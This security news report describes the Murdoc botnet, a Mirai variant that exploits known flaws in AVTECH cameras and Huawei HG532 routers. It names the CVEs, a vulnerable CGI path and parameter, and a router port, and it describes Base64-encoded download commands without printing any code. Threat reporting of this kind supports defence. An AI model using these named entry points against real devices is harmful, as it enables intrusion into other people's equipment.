Endpoint Security
,
Internet of Things Security
Murdoc Botnet Uses Over 100 Distinct C2 Servers to Manage Infected Devices

A new variant of the Mirai malware is exploiting vulnerabilities in cameras and routers to infiltrate devices, download payloads and integrate them into an expanding botnet.
See Also: Cracking the Code: Securing Machine Identities
The Qualys Threat Research Unit uncovered “a large-scale, ongoing operation,” dubbed the Murdoc Botnet, that is exploiting known vulnerabilities, including CVE-2024-7029 and CVE-2017-17215, to target users of AVTECH cameras and Huawei HG532 routers.
The malware employs enhanced shell scripts and ELF files. Compromised devices communicate with a command-and-control network, enabling attackers to orchestrate distributed denial-of-service attacks.
Qualys tracked over 1,300 active internet protocol addresses linked to Murdoc since its emergence in July 2024. The botnet’s primary targets include Internet of Things devices used for consumer and small-to-medium business purposes.
AVTECH is a Taiwanese manufacturer known for producing surveillance systems, including network cameras and DVRs, widely used for video security. Their products are commonly deployed in small businesses, residential setups, retail outlets and public facilities.
Censys in September 2024 observed 37,995 exposed AVTECH cameras and operators of yet another botnet targeting the CVE-2024-7029 vulnerability. The botnet was Mirai variant Corona, of which Murdoc is itself a variant.
The vulnerability enabled command injection through the brightness function in the CGI script at /cgi-bin/supervisor/Factory.cgi
, Censys said.
Murdoc attackers use embedded Base64 commands to download and execute payloads. This method facilitates infection and also ensures the removal of traces, complicating detection and mitigation efforts.
The other vulnerability, CVE-2017-17215, is a remote code execution vulnerability from 2017 that allows an authenticated attacker to send malicious packets to port 37215 to launch attacks. Successful exploits could lead to the remote execution of arbitrary code.
Huawei HG532 is a consumer-grade broadband router primarily used for home internet connections. These routers are often distributed by internet service providers as part of their service packages. They are popular in Asia, Africa and parts of Europe due to their affordability and support for ADSL2+ broadband services.
The campaign uses over 100 distinct C2 servers to manage infected devices and distribute malware. These servers, embedded with payloads, enable attackers to maintain a persistent presence and execute large-scale operations.
Researchers identified over 500 malware samples, each demonstrating advanced infection mechanisms that exploit outdated firmware and weak security protocols.
Murdoc Botnet’s global victim list includes devices located in Malaysia, Thailand, Mexico and Indonesia.